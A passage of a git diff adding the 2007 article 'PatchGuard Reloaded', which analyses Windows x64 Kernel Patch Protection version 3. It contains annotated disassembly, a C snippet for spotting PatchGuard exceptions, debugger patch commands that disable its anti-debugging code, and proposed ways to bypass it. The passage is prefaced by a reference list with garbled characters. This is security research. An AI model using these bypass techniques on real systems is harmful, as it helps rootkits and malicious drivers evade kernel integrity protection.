G.711 ¿ wikipedia, the free encyclopedia. http:// + en.wikipedia.org/w/index.php?title=G.711&oldid=151887535, 2007. + [Online; accessed 6-September-2007]. +[18] Wikipedia. Least signi¿cant bit ¿ wikipedia, the free en- + cyclopedia. http://en.wikipedia.org/w/index.php?title= + Least significant bit&oldid=150766150, 2007. [Online; accessed + 6-September-2007]. +[19] Voip foro - codecs. http://www.voipforo.com/en/codec/codecs.php, + 2007. [Online; accessed 5-September-2007]. +[20] I)ruid. Steganrtp. http://sourceforge.net/projects/steganrtp/, Au- + gust 2007. +[21] D. Eastlake 3rd and P. Jones. Us secure hash algorithm 1 (sha1). RFC 3174, + Internet Society (IETF), September 2001. +[22] I)ruid. lib¿ndrtp. http://sourceforge.net/projects/libfindrtp/, + February 2007. +[23] Net¿lter. http://www.netfilter.org/, 2007. [Online; accessed 6- + September-2007]. +[24] Wikipedia. Type-length-value ¿ wikipedia, the free encyclopedia. http: + //en.wikipedia.org/w/index.php?title=Type-length-value&oldid= + 128880452, 2007. [Online; accessed 3-September-2007]. +[25] Bob Jenkins. Net¿lter. http://www.burtleburtle.net/bob/c/lookup3.c, + May 2006. [Online; accessed 6-September-2007]. +[26] Wikipedia. Exclusive or ¿ wikipedia, the free encyclopedia. http://en. + wikipedia.org/w/index.php?title=Exclusive or&oldid=152332544, + 2007. [Online; accessed 5-September-2007]. diff --git a/uninformed/8.2.txt b/uninformed/8.2.txt new file mode 100644 index 0000000..5017991 --- /dev/null +++ b/uninformed/8.2.txt @@ -0,0 +1,1111 @@ +PatchGuard Reloaded: A Brief Analysis of PatchGuard Version 3 +September, 2007 +Skywing +skywing@valhallalegends.com +http://www.nynaeve.net/ + +Abstract: Since the publication of previous bypass or circumvention techniques +for Kernel Patch Protection (otherwise known as ``PatchGuard''), Microsoft has +continued to refine their patch protection system in an attempt to foil +known bypass mechanisms. With the release of Windows Server 2008 Beta 3, +and later a full-blown distribution of PatchGuard to Windows Vista / +Windows Server 2003 via Windows Update, Microsoft has introduced the next +generation of PatchGuard to the general public (``PatchGuard 3''). As with +previous updates to PatchGuard, version three represents a set of +incremental changes that are designed to address perceived weaknesses and +known bypass vectors in earlier versions. Additionally, PatchGuard 3 +expands the set of kernel variables that are protected from unauthorized +modification, eliminating several mechanisms that might be used to +circumvent PatchGuard while co-existing (as opposed to disabling) it. This +article describes some of the changes that have been made in PatchGuard 3. +This article also proposes several new techniques that can be used to +circumvent PatchGuard's defenses. Countermeasures for these techniques are +also discussed. + +1) Introduction + +PatchGuard is a controversial feature of Windows x64 editions, starting with +Windows Server 2003 x64 / Windows XP x64, and continuing on with Windows Vista +x64 and Windows Server 2008 x64. The design goals behind PatchGuard are to +prevent the kind of rampant hooking and modification of various kernel code +and data structures that has been so common on x86 versions of Windows. +Microsoft has stated that the vast majority of kernel crashes are caused by +third party drivers, and the author's experiences with Windows firmly support +this supposition. 
Because accessing internal kernel data structures and hooking kernel
+functions typically requires intricate synchronization with the rest of the
+system in order to be performed in a completely safe fashion, especially on
+multiprocessor machines, many third party drivers that perform these sorts
+of dangerous tasks have historically made egregious mistakes that have
+often led to system instability or a compromise of system security. The
+latter is especially common in cases where third party programs hook
+functions, such as system calls, and subsequently fail to perform
+sufficient parameter validation.
+
+Microsoft's solution to this problem is to attempt to forcibly prevent
+third party code from making unauthorized modifications to internal kernel
+data structures and code through technical means in addition to
+discouraging developers from performing such tasks. However, due to the
+nature of how the Windows kernel (and its supporting drivers) are designed,
+it is not feasible for kernel mode drivers to run at a lower effective
+privilege level than the kernel itself. This poses a problem with respect
+to Microsoft's goal of blocking unauthorized kernel patches due to the fact
+that there is no hardware-enforced separation between the kernel itself and
+third-party drivers. As such, said third party drivers have free rein to
+manipulate kernel code and data as desired.
+
+Although emerging technologies such as TPM and hardware-assisted
+virtualization (hypervisors) may eventually provide a mechanism to deploy a
+hardware-enforced boundary between certain key parts of the kernel and the
+third party drivers that interact with it, such an approach is not
+generally applicable to most computers sold today, given the current state
+of the technology involved (with respect to both hardware and software
+capabilities). Lacking a complete, hardware-enforced solution, Microsoft
+has turned to other approaches to dissuade third party software from making
+unauthorized kernel modifications. Specifically, the resulting kernel patch
+protection mechanism ("PatchGuard") is instead based on highly obfuscated
+code that, while running at the same effective privilege level as both the
+kernel itself and third party drivers, is designed to be resilient against
+detection and/or modification by third party drivers. This code is
+responsible for periodically checking the integrity of key kernel code and
+data structures and will bring down the system if such modifications are
+detected. Whereas blithely patching the kernel was once possible on Windows
+x86 editions, attempting to perform the same operations on x64 versions of
+Windows will result in a system crash. As such, third party drivers are
+effectively prevented from making such modifications on a large-scale basis
+with respect to code deployed on customer systems.
+
+However, like all systems that are founded upon the principle of security
+through obscurity, PatchGuard has inherent weaknesses. These weaknesses can
+be exploited by third party drivers to either disable PatchGuard entirely
+or circumvent its checks altogether while peacefully co-existing with
+PatchGuard. Microsoft is fully aware of these deficiencies with respect to
+the fundamental approach taken by PatchGuard and has resorted to
+periodically updating PatchGuard in such a way as to block known public
+bypass techniques.
The net result is that Microsoft gives the impression of a ``moving target''
to any ISV that would defy Microsoft's wishes with respect to circumventing
PatchGuard. This helps to show that any code designed to stop or disable
PatchGuard may become invalidated at some point in the future, such as when
Microsoft releases a new update for PatchGuard. This has resulted in a small
arms race, with code to circumvent PatchGuard being written by third parties,
and Microsoft responding by developing and deploying countermeasures in the
form of an updated version of PatchGuard that is not susceptible to these
bypass techniques. This cycle has continued through several iterations
already; in fact, PatchGuard is now being deployed to the general public in
its third iteration.

2) Protection Improvements

PatchGuard 3 implements several incremental improvements designed to protect
PatchGuard from third party code attempting to disable it as compared to
PatchGuard 2. The majority of the alterations to PatchGuard's self-defense
logic appear to be direct responses to previously published, publicly-known
bypass techniques, rather than general improvements meant to make PatchGuard 3
more resilient to analysis and attack. In this vein, while the alterations to
PatchGuard 3 (over PatchGuard 2) are effective at disabling most
previously-published bypass mechanisms that the author is aware of, it is not
exceedingly difficult to alter many previous attack mechanisms to be effective
against PatchGuard 3. Many of the protection systems that were implemented in
PatchGuard 2 are still present in PatchGuard 3 in some form or another, though
some of them have been altered to resist previously-published attacks.

This chapter will describe a number of specific improvements that have been
made.

2.1) Multiple Concurrent PatchGuard Check Contexts

In previous PatchGuard releases, there existed a single PatchGuard check
context that would periodically be used to verify the integrity of protected
regions. Some bypass techniques relied on the fact that there existed only
one PatchGuard context, disabling any invasive kernel patching that would be
required to ``catch PatchGuard in the act'' once PatchGuard had been located.
PatchGuard 3 improves upon this by creating at least one PatchGuard context if
PatchGuard is enabled, with a probability of a second context being
initialized at system boot time. This is randomized based on the processor
time stamp counter, as is all other PatchGuard randomization. Both PatchGuard
check contexts, which include all of the data used by PatchGuard to check
system integrity (including the self-decrypting check routine in non-paged
pool memory), operate completely independently if two contexts happen to be
used for a particular system boot.

There are several advantages to randomly creating more than one check context.
First of all, because the second context is not always created, an element of
uncertainty is (theoretically) introduced into the testing and development
process for PatchGuard bypass techniques, as it is possible that at first
glance, an individual that is researching PatchGuard 3 might not notice that
there is a chance to create more than one context. This may result in lost
time during the debugging process, as some bypass techniques are affected by
the number of active contexts.
For example, the original bypass technique
described by the author for PatchGuard 2 [1] effectively turned itself off
after the first positive indication that PatchGuard was caught (although in
this particular instance, the PatchGuard-catching hooks could have been
allowed to remain in place afterwards).

A better example of bypass techniques that might be affected by this sort of
scheme is those that rely on searching system pool memory for a sign of
PatchGuard. For example, a theoretical bypass scheme that operates by
pro-actively locating the PatchGuard context in non-paged pool and disabling
it somehow (perhaps by rewriting the self-decrypting code stub to expand into
a no-operation function) might run afoul of this approach randomly during
testing if it were not designed to re-try a pool memory scan after a positive
hit on PatchGuard. It also eliminates the degree of confidence that such
memory scan approaches provide: previously, if one had a way to locate the
PatchGuard context in non-paged pool memory, one would know for certain that
PatchGuard had in fact been disabled after getting a single hit (which could
be taken as an indication that it would now be safe to perform actions blocked
by PatchGuard). With multiple check contexts having a probability to run, it
is no longer possible for a bypass technique to have logic along the lines of
``if a PatchGuard context has been located and disabled, then it is safe to
continue'', because there may exist a non-constant number of contexts in the
wild.

2.2) Filtering of Exception Codes Used to Trigger PatchGuard Execution

Like PatchGuard 2, and PatchGuard 1 before it, the third iteration of
PatchGuard is primarily executed through an unhandled exception in a DPC
routine which, through the use of a series of structured exception handlers,
eventually results in the self-decrypting PatchGuard stub being called in
non-paged pool memory (based on the DPC arguments). This presented itself
as a liability, as evidenced by the previous article [1] published on
Uninformed on the subject of disabling PatchGuard (release 2). The problem
with using SEH to trigger execution is that there are a number of points in
the SEH dispatching mechanism that can easily be modified by an external
caller in order to gain execution after an exception is raised, but before a
registered exception handler itself might be called.

Previous techniques exploited this weakness by positioning themselves after
the access violation exception raised when a PatchGuard-repurposed DPC routine
dereferences a specially-crafted invalid pointer argument, but before the SEH
logic that invokes the PatchGuard check context in response to that access
violation. Specifically, the operating system exported routine used by the
Microsoft C/C++ compiler for all compiler-generated SEH frames,
_C_specific_handler, was targeted by bypass attempts described in the
aforementioned articles. As the SEH frame responsible for running PatchGuard
appears to have been written in C for PatchGuard releases 1 and 2,
_C_specific_handler would be called before the user-supplied SEH logic which
would be responsible for executing the PatchGuard integrity check logic
contained within the current PatchGuard context. At this point, a bypass
technique need only abort the execution of the PatchGuard check routine and
cleanly extricate itself from the call stack to a known-good location in order
to disable PatchGuard.
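
As an illustration of how little was needed to tell PatchGuard apart in those
releases, the following is a minimal sketch (with a hypothetical helper name;
it is not the code from the published bypass) of the kind of predicate such an
interception point could apply to an exception record. The specific signature
it keys on, an access violation referencing the highest possible kernel
address, is discussed in more detail below.

#include <ntddk.h>

#ifndef STATUS_ACCESS_VIOLATION
#define STATUS_ACCESS_VIOLATION ((NTSTATUS)0xC0000005L)
#endif

//
// Hypothetical sketch of the PatchGuard 1/2-era identification test that an
// exception dispatch hook could apply before aborting the check routine.
// An access violation carries two parameters; the second is the address that
// was referenced, which for PatchGuard 1 and 2 is reported as
// 0xFFFFFFFFFFFFFFFF due to the non-canonical address dereference.
//
static BOOLEAN
PgpExceptionLooksLikePatchGuard(
    IN PEXCEPTION_RECORD ExceptionRecord
    )
{
    return (BOOLEAN)(
        ExceptionRecord->ExceptionCode             == STATUS_ACCESS_VIOLATION &&
        ExceptionRecord->NumberParameters          >= 2                       &&
        ExceptionRecord->ExceptionInformation[ 1 ] == (ULONG_PTR)-1);
}
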

However, in order for such a bypass mechanism to properly function, one would
need to ensure that the particular exception being examined by
_C_specific_handler is in fact PatchGuard and not a legitimate kernel mode
exception. Applying a PatchGuard-style bypass to the latter case would be
disastrous and almost certainly result in the system crashing or being
corrupted immediately after the fact. Given this, positively identifying an
exception from the exception dispatcher interception point is key to any
bypass technique built upon exception dispatcher redirection. The previous
two PatchGuard releases, however, made identifying PatchGuard a trivial task.
In both cases, a special form of invalid address, a ``non-canonical address'',
is dereferenced to trigger the access violation that ultimately results in
PatchGuard's check context being executed. A non-canonical address is an
address that does not fall within the subset of a 64-bit address space
presented by modern x64 processors.

The advantage of using a non-canonical address is clear when one examines the
PatchGuard execution environment for a moment. In Windows kernel mode
programming, it is not generally possible to blindly dereference a bogus
kernel mode pointer. This often results in a sequence of events that brings
down the system, depending on where the dereferenced location is. A
non-canonical address is a special (undocumented) exception to this rule, as
the processor reports the exception via a general protection fault and not the
typical page fault mechanism. In this case, the operating system reports the
exception as an access violation related to an access of the highest kernel
address (0xFFFFFFFFFFFFFFFF). This distinct signature can be used to locate
and disable PatchGuard in a relatively safe fashion, as bogus kernel mode
addresses should never make it to SEH dispatching (in kernel mode) unless the
system is about to crash due to a fatal driver or kernel bug (PatchGuard being
a special case). Thus, it was previously possible to positively identify
PatchGuard by looking for an access violation that referenced
0xFFFFFFFFFFFFFFFF.

PatchGuard 3 improves the situation somewhat by performing some pre-filtering
of the exception data through an exception handler written in assembly (which
thus does not invoke _C_specific_handler) before the _C_specific_handler based
logic that actually invokes the PatchGuard check routine is executed.
Specifically, the pre-filtering exception handler, whose code is given below,
alters the exception code to take on a random value which overlaps with many
valid kernel mode exceptions. For example, some status codes that are
applicable to the file system space are used, such as
STATUS_INSUFFICIENT_RESOURCES, STATUS_DISK_FULL, and STATUS_CANT_WAIT.
Additionally, the exception address is altered as well (in some cases even set
to be pointing into the middle of an instruction), and the dereferenced
address (the second exception parameter for access violations) is also set to
a randomized value. After these alterations are made, the assembly-language
exception handler passes control on to the _C_specific_handler based exception
handler, which invokes PatchGuard.
Annotated
disassembly for one of the assembly-language pre-filter exception handlers is
provided below:

;
; EXCEPTION_DISPOSITION
; KiCustomAccessHandler8 (
;    /* rcx */ IN PEXCEPTION_RECORD ExceptionRecord,
;    /* rdx */ IN ULONG64 EstablisherFrame,
;    /* r8  */ IN OUT PCONTEXT ContextRecord,
;    /* r9  */ IN OUT struct _DISPATCHER_CONTEXT* DispatcherContext
;    );
KiCustomAccessHandler8 proc near
 test [rcx+_EXCEPTION_RECORD.ExceptionFlags], 66h
loc_14009B4C7:
 jnz short retpoint
 rdtsc
; Randomize ExceptionInformation[ 1 ]
; ( This is the "referenced address" for
; an access violation exception. )
;
; ( Note that rax is not set to any
; specific defined value in this
; context.  It depends upon the value
; that RtlpExecuteHandlerForException
; and by extension RtlDispatchException
; last set rax to. )
 mov [rcx+(_EXCEPTION_RECORD.ExceptionInformation+8)], rax
 xor [rcx+(_EXCEPTION_RECORD.ExceptionInformation+8)], rdx
 shr eax, 5
 and eax, 70h
 sub [r8+98h], rax
 and edx, 7Fh
 or edx, 0C0000000h
; Set ExceptionCode to a random value.  The code
; always has 0xC0000000 set, and the lowest byte
; is always masked with 7F.  This often results
; in an exception code that appears like a
; legitimate exception code.
 mov [rcx+_EXCEPTION_RECORD.ExceptionCode], edx
 lea rax, loc_14009B4C7+1
; Set ExceptionAddress to a bogus value.  In this case,
; it is set to point into the middle of an instruction.
; This may interfere with attempts to unwind successfully
; from the exception.
 mov [rcx+_EXCEPTION_RECORD.ExceptionAddress], rax
; Set Context->Rip to the same
; bogus exception address value.
 mov [r8+0F8h], rax
 and qword ptr [r8+88h], 0
retpoint:
 mov eax, 1
 retn

KiCustomAccessHandler8 endp

As a direct result of the scrubbing of the exception and context records by
the assembly-language exception routine, it is no longer possible to use the
old mechanism of looking for an access violation referencing
0xFFFFFFFFFFFFFFFF in order to differentiate a PatchGuard exception from the
many legitimate kernel mode exceptions. In other words, PatchGuard attempts
to hide in plain sight amongst the normal background noise of kernel mode
exceptions, the vast majority of which originate inside filesystem-related
code.

2.3) Executing PatchGuard Without SEH

One recurring theme that has continued to remain a staple for PatchGuard since
its inception is the use of structured exception handling to obfuscate the
calls to PatchGuard. The intention here is to use the many differences of SEH
between x64 and x86, and the lack of disassembler support for x64 SEH, to make
it difficult to understand what is happening when calls to PatchGuard are
being made. Ironically, this use of x64 SEH as an obfuscation mechanism has
been a catalyst for much of the author's research [2] into Windows x64 SEH.
Today, it is the author's opinion that x64 exception handling is now publicly
documented to an extent that is comparable to (or even exceeds) that available
for x86 SEH.

Although x64 SEH may have been useful as an obfuscation technology initially,
it had clearly worked its way up to being a major liability after PatchGuard 2
had been released. This is due to the fact that SEH-related aspects of
PatchGuard had been successfully used to defeat PatchGuard on multiple
occasions. With the advent of PatchGuard 3, the authors of PatchGuard seized
the opportunity to extricate themselves in some respect from the liability
that x64 SEH had become.
+ +PatchGuard 3 introduces a special mode of operation that allows it to function +without using SEH. This is a significant change (and improvement) with +respect to how PatchGuard has traditionally operated. It eliminates a major +class of single points of failure in that the exception dispatching path is +particularly vulnerable to external interference in terms of third party +drivers intercepting SEH dispatching before control is transferred to actual +exception handlers. The SEH-less mode of PatchGuard 3 operates by copying a +small section of code into non-paged pool memory (as part of a PatchGuard +context block). This code is then referenced by a timer object's +DeferredRoutine at the non-paged pool location in question. The code referred +to by the timer object is essentially a stripped down version of what happens +when any of the re-purposed DPC routines are invoked by PatchGuard: it sets up +a call to the first stage self-decrypting stub that ultimately calls the +system check routine. + +By completely eliminating SEH as a launch vector for PatchGuard, many bypass +techniques that hinged on being able to catch PatchGuard in the SEH +dispatching code path are completely invalidated. In an example of defense in +depth in terms of software protection systems, the old, SEH-based system is +still retained (with the previously mentioned modifications), such that a +would-be attacker now has multiple isolated launch vectors that he or she must +deal with in order to block PatchGuard from executing. Annotated disassembly +of the direct call routine that is copied to non-paged pool and invoked +without SEH is presented below: + +KiTimerDispatch proc near + pushf + sub rsp, 20h + mov eax, [rsp+28h+var_8] + xor r9d, r9d + xor r8d, r8d + mov [rsp+28h+arg_0], rax +; [rcx+40] -> PatchGuard Decryption Key + mov rax, [rcx+40h] + mov rcx, 0FFFFF80000000000h + xor rax, rdx +; Form a valid address for the PatchGuard context block by +; xoring the decryption key with the DeferredContext +; argument. + or rax, rcx +; Set the initial code for the stage 1 self-decrypting stub. + mov rcx, 8513148113148F0h + mov rdx, [rax] + mov dword ptr [rax], 113148F0h + xor rdx, rcx + mov rcx, rax +; Call the stage 1 self-decrypting stub. + call rax + add rsp, 20h + pop rcx + retn +KiTimerDispatch endp + +2.4) Randomized Call Frames in Repurposed DPC Routine Exception Paths + +One of the bypass vectors proposed for PatchGuard 2 was to intercept execution +at _C_specific_handler, detect PatchGuard, and resume execution at the return +point of the PatchGuard DPC (i.e. inside the timer or DPC dispatcher). This +is trivially possible due to the extensive unwind metadata present on Windows +x64 combined with the fact that a DPC that has been re-purposed by PatchGuard +does no useful work (other than invoking PatchGuard) and has no meaningful +effect on any out parameters or return value. + +In order to counteract this weakness, PatchGuard 3 introduces a random number +of function calls when a re-purposed DPC is called, but before any exception +is triggered. The intent with this randomization of the call frame stack is +to invalidate the approach of always unwinding one level deep in order to +effect a return from the DPC routine in question. 
Because there are a random
number of call frames between the point at which an exception is raised and
the start of the PatchGuard DPC routine, and the fact that the PatchGuard DPC
routines are not exported, it is more difficult to safely return out of a
PatchGuard DPC routine from anywhere in the SEH dispatching code path.

An example of the call frame randomization code is provided below (in this
case, ecx is initialized to a small, random number that denotes the number of
calls to make). There are a number of routines in the form of
KiCustomRecurseRoutineN, where N is [0..9], each identical.

KiCustomRecurseRoutine4 proc near
 sub rsp, 28h
 dec ecx
 jz short retpoint
 call KiCustomRecurseRoutine5
retpoint:
 mov eax, [rdx]
 add rsp, 28h
 retn
KiCustomRecurseRoutine4 endp

Although unwinds can still be performed, an attacker would need to be able to
locate the actual return address of the PatchGuard DPC routine, which might
involve differentiating between the bogus KiCustomRecurseRoutine calls and the
actual call into the DPC routine itself.

3) Additional Protection Mechanisms

PatchGuard 3 and PatchGuard 2 both share some additional protection mechanisms
that have not been previously described. This chapter includes a description
of these protection mechanisms.

3.1) Timer List Obfuscation

PatchGuard 2 and PatchGuard 3 employ an obfuscation scheme that is used to
obfuscate timer and DPC object pointers in the timer list. This obfuscation
scheme hinges around two special kernel variables, KiWaitAlways and
KiWaitNever, that represent two random obfuscation keys that are calculated at
boot time. These obfuscation keys are used to encode various pointers (such
as links to DPC objects in a KTIMER object residing in the kernel timer list)
that are intended to be protected from outside interference. For example, the
following algorithm is used to decode the KDPC link in a KTIMER object when a
timer DPC is going to be executed at expiration:

ULONGLONG Deobfuscated;
PKDPC     RealDpc;

Deobfuscated = (ULONGLONG)Timer->Dpc ^ KiWaitNever;
Deobfuscated = _rotl64(Deobfuscated, (UCHAR)KiWaitNever);
Deobfuscated = Deobfuscated ^ (ULONGLONG)Timer;
Deobfuscated = _byteswap_uint64(Deobfuscated);
Deobfuscated = Deobfuscated ^ KiWaitAlways;

RealDpc = (PKDPC)Deobfuscated;

By virtue of KiWaitAlways and KiWaitNever being non-exported kernel variables,
the original intention of such a scheme was to make it difficult for third
party drivers to easily interfere with the timer list or certain other
protected pointers. However, the algorithm itself is fairly easy to
understand once one locates code that references it (such as most any
timer-related code in the kernel), which leaves the difficulty of determining
the values of KiWaitAlways and KiWaitNever at runtime as the only remaining
protection for the timer-list-to-DPC-object obfuscation.

Ironically, the kernel debugger extension !kdexts.timer implements the
decoding algorithm (in kdexts!KiDecodePointer) so that a valid timer list can
be presented to the user if the timer display command is invoked. Because the
kernel debugger has access to PDB symbols for the kernel, it can trivially
locate KiWaitAlways and KiWaitNever.

3.2) Anti-Debugging Code at PatchGuard Initialization Time

As with PatchGuard 2, PatchGuard 3 includes a sizable amount of anti-debugging
code at runtime that is intended to frustrate attempts to step through the
PatchGuard initialization routines with a debugger.
Most of this code is
based upon checking if a debugger is present while the PatchGuard
initialization routines are executing (which should not typically occur, as
the PatchGuard initialization routines are only called if a debugger is not
attached), and, if a debugger is so detected, disabling interrupts and
entering a spin loop so as to unrecoverably freeze the system.

Although this anti-debugging code may appear intimidating at first, disabling
it is only a matter of locating all references to KdDebuggerNotPresent within
the PatchGuard initialization routine and patching out the checks from the
debugger. For example, the author used the following set of commands in the
debugger at initialization time to disable the anti-debugging checks for
Windows Vista x64 SP0, kernel version 6.0.6000.16514:

bp nt!KeInitAmd64SpecificState + 12 "r @edx = 1 ; r @eax = 1 ; g"
bp nt!KiFilterFiberContext
eb nt!KiFilterFiberContext+0x20 eb
eb nt!KiFilterFiberContext+0x19a eb

eb fffff800`01c63d22 eb
eb fffff800`01c64686 eb
eb fffff800`01c652be eb
eb fffff800`01c65334 eb
eb fffff800`01c65880 eb
eb fffff800`01c65a65 eb
eb fffff800`01c67479 eb
eb fffff800`01c68798 eb
eb fffff800`01c6a940 eb
eb fffff800`01c6b7a9 90 90
eb fffff800`01c6b7dd eb
eb fffff800`01c6bad9 eb
eb fffff800`01c6d0e7 eb
eb fffff800`01c6d2f6 eb
eb fffff800`01c6d650 eb
eb fffff800`01c65c3a 90 90 90 90 90 90
eb fffff800`01c690b1 90 90 90 90 90 90

3.3) KeBugCheckEx Protection

One of the first bypass mechanisms proposed for PatchGuard 1 was to hook the
code responsible for bugchecking the system [4]. From there, an attacker
would simply resume normal system execution.

There are several defensive mechanisms in place to prevent this. In the
current version of PatchGuard, the entire contents of the thread stack are
filled with zeros, making it difficult to resume execution of whichever thread
was responsible for calling into PatchGuard. Furthermore, PatchGuard appears
to make a copy of KeBugCheckEx at system initialization time, and copies this
version over the actual code residing within the kernel at runtime just before
bringing down the system in a bug check. This is clearly visible by making a
modification to KeBugCheckEx in the debugger just as one enters the PatchGuard
check context, and then setting a breakpoint on the internal function in the
PatchGuard context that calls KeBugCheckEx after clearing the stack and all
registers. If one then examines KeBugCheckEx, any modifications that have
been made will have vanished.

Additionally, PatchGuard appears to disable DbgPrint (patching it out with a
"ret" opcode) before calling KeBugCheckEx. This may have been a (failed)
attempt to prevent easy access to execution within KeBugCheckEx without
actually patching KeBugCheckEx itself, which would circumvent the
aforementioned protection on modifications to the bugcheck code itself.
(KeBugCheckEx ordinarily utilizes DbgPrintEx to display a banner to the
debugger when a bug check occurs. However, because PatchGuard only patches
DbgPrint, there is little to no effect in terms of what ends up happening
when the bug check finally does happen.)

This code can be seen in the PatchGuard check routine, just before a call to
the KeBugCheckEx wrapper is made. The pointer to DbgPrint is established
during PatchGuard initialization at boot time.

mov rax, [rbx+PATCHGUARD_CONTEXT.DbgPrint]
mov byte ptr [rax], 0C3h ; ret

3.4) Two-Stage Code Deobfuscation

One of the more interesting defensive features of PatchGuard 2 and PatchGuard
3 is the mechanism by which it obfuscates the PatchGuard check context, or the
code and data necessary to verify system integrity. PatchGuard contexts are
obfuscated such that they are completely randomized in-memory while inactive,
and change their location and obfuscation keys (and thus contents) each time
the context is invoked to check system integrity.

The decryption phase of PatchGuard is split into two stages. The first stage
is essentially a small stub that remains completely obfuscated in-memory until
just before it is called. The caller overwrites the first instruction in the
stub that is called with a "lock xor qword ptr [rcx], rdx" instruction. The
arguments to the stub are the address of the stub itself (in rcx), and the
decryption key (in rdx). Thus, the first instruction modifies itself (and,
more importantly, the subsequent instruction, as each instruction is 4 bytes
long but modifies 8 bytes of opcode bytes), which results in the subsequent
instruction becoming another xor instruction. A small series of these xor
instructions continues until the second stage of the decoding stub is
completely decoded.

At this point, the second stage of the decoding stub is plaintext and may now
execute. The second stage consists of a loop of xor operations starting at
the end of the PatchGuard context and moving backward until the entire check
routine is decoded. Additionally, the decryption key is shifted each xor
round during the second stage decoding process.

After the second stage decoding loop is complete, control is transferred to
the now-plaintext integrity check routine (all of the supporting data, such as
critical function pointers into the kernel, will also have been translated
into plaintext at this point by the second stage decoding loop).

Source code to a basic program to decrypt a PatchGuard memory context is
included with the article. The program expects to be supplied with a file
containing "dq" logs from the kernel debugger that cover the entire memory
context, along with the decryption key (at KDPC + 0x40) and
KDPC->DeferredContext values.

3.5) Code Patching Support

Given PatchGuard's penchant for blocking attempts to patch the kernel, one
would think that all kernel code is essentially expected to be fixed in stone
at boot time. However, this is not really the case. There are a number of
approved kernel patches that PatchGuard supports. For example, several
functions (such as SwapContext) can be patched in approved ways if hypervisor
support is enabled. In the case of SwapContext, for instance, a runtime patch
is made to redirect execution to EnlightenedSwapContext through a jump
instruction being written to the start of the routine. PatchGuard appears to
detect and permit patches to these functions through special exemptions (one
can observe the address of functions such as SwapContext being stored in the
PatchGuard context at initialization time, presumably for such a purpose).

The code responsible for checking the integrity of the SwapContext patch is
provided below. Because the check ensures that a branch can only occur to
EnlightenedSwapContext, it would be difficult to utilize this code to perform
an arbitrary patch at SwapContext.

cmp rdi, [rbx+PATCHGUARD_CONTEXT.SwapContext]
jnz short NotSwapContextExemption
cmp byte ptr [rdi], 0EBh ; backward jmp (short)
jnz short NotSwapContextExemption
cmp byte ptr [rdi+1], 0F9h
jnz short NotSwapContextExemption
cmp byte ptr [rdi-5], 0E9h ; jmp (long)
jnz short NotSwapContextExemption
mov rcx, [rbx+PATCHGUARD_CONTEXT.EnlightenedSwapContext]
movsxd rax, dword ptr [rdi-4]
sub rcx, rdi
cmp rax, rcx
jz short BadSwapContextHook

There also exists a second set of patches that PatchGuard must allow for
compatibility with older processors. Very early releases of x64 processors by
Intel did not implement the prefetch instruction, and so the kernel has
support for detecting an illegal opcode fault on a prefetch instruction and
reacting by patching out the prefetch opcode on-the-fly. However, this sort
of on-the-fly patching is not normally permitted by PatchGuard (for obvious
reasons), at least not without special support. During initialization,
PatchGuard generates some code that executes a prefetch operation, and then
checks whether the count of patched prefetch instructions was incremented
after executing the generated code. If the processor is an older model
without prefetch support, then a special exemption (the "prefetch whitelist")
is activated that exempts a list of RVAs from the image base from PatchGuard's
checks. This list of RVAs is stored in a binary resource appended to
ntoskrnl.exe (named "PREFETCHWLIST").

The code for detecting whether the prefetch exemption should be enabled at
boot time is as follows (the result of the check is, for Windows Server 2008
Beta 3, stored at offset 2B1 into the PatchGuard context):

call KeGetPrcb
mov ecx, 2
cmp [rax+63Dh], cl ; Prcb->CpuVendor
mov [rsp+0EC8h+var_D48], rax
jnz short SkipEnablePrefetchPatchExemption
lea rdx, [rsi+214h] ; PrefetchRoutineCode
mov dword ptr [rdx], 0C3090D0Fh ; prefetch [rcx] ; ret
mov ebx, cs:KiOpPrefetchPatchCount
lea rcx, [rsp+0EC8h+arg_18]
call rdx
mov ecx, cs:KiOpPrefetchPatchCount
cmp ebx, ecx
jz short SkipEnablePrefetchPatchExemption

mov [rsi+2B1h], dil ; EnablePrefetchPatchExemption

SkipEnablePrefetchPatchExemption:
;
; Initialization continues ...
;
mov eax, 100000h

4) Bypass Mechanisms and Countermeasures

As with PatchGuard 2, it would be folly to state that PatchGuard 3 is
invulnerable to assault by third party driver code intent on performing
operations blocked by PatchGuard. There are many possible attacks on the new
defenses in PatchGuard 3 (as well as several possible countermeasures that
Microsoft could take in order to break the proposed bypass mechanisms in a
future PatchGuard iteration). This article will describe specific attacks
that are capable of defeating PatchGuard 3.

4.1) Hybrid Exception Interception and Memory Searching

As PatchGuard 3 utilizes completely randomized (self-decrypting) blocks of
code and data for its constituent PatchGuard contexts in the SEH execution
case, it is not generally possible to trivially locate and disable PatchGuard
contexts through a non-paged pool scan. Additionally, due to PatchGuard 3's
break from relying upon SEH to invoke PatchGuard in all cases, it is also not
generally possible to disable PatchGuard 3 reliably via interception of the
SEH dispatching code path.

While these defenses do complement one another, there still exist weaknesses
that can be exploited by a third party.
Specifically, when PatchGuard is +running through a re-purposed DPC routine that is invoked via SEH, it is +vulnerable in that the SEH dispatching code path can be intercepted to locate +(and disable) PatchGuard just before it is executed. Furthermore, in the case +where PatchGuard runs without any SEH obfuscation, it is vulnerable to a +memory search, as there is (necessarily) some static code placed in non-paged +pool memory which makes the translation between the DPC function calling +convention and the PatchGuard stage 1 decryption routine's calling convention. + +By combining a memory search approach with the previously described SEH +interception approach, it is possible to attack both launch vectors of +PatchGuard simultaneously, with the effect of disabling it no matter which +vector(s) are used in a particular boot. + +However, there are still some sticking points that need to be resolved in the +SEH interception case. As previously mentioned, the SEH-obfuscation-based +launch vector was significantly improved over PatchGuard 2, with obfuscation +of the exception information and randomization of the call stack from the +point of view of the exception dispatcher logic itself. These obstacles must +be overcome in order to successfully mount an attack using this approach +against PatchGuard 3. + +The first problem relating to the obfuscation and randomization of the +exception information turns out to not be the roadblock that one might think +at first glance. There are some weaknesses of the obfuscation logic that +allow the true colors of the exception to show through if one is clever about +examining the information available at the point of _C_specific_handler. +Furthermore, it is also possible to hook at a lower level than +_C_specific_handler, such as KiGeneralProtectionFault (easily located by +examining the IDT), which would get one in before the assembly-language +exception handler logic has a chance to fudge the exception information. + +Although the KiGeneralProtectionFault vector is easier to implement in that it +completely bypasses one of the new defensive mechanisms with respect to the +SEH-related PatchGuard execution code path, it is again still possible to +attack PatchGuard using _C_specific_handler by relying upon information +leakage when _C_specific_handler is called. Specifically, all exceptions +altered by PatchGuard originate within the confines of the kernel itself, all +of the exceptions have two parameters (most of the "legitimate" versions of +exceptions like STATUS_INSUFFICIENT_RESOURCES always have zero parameters, +because they originate from within RtlRaiseStatus which never stores any +exception 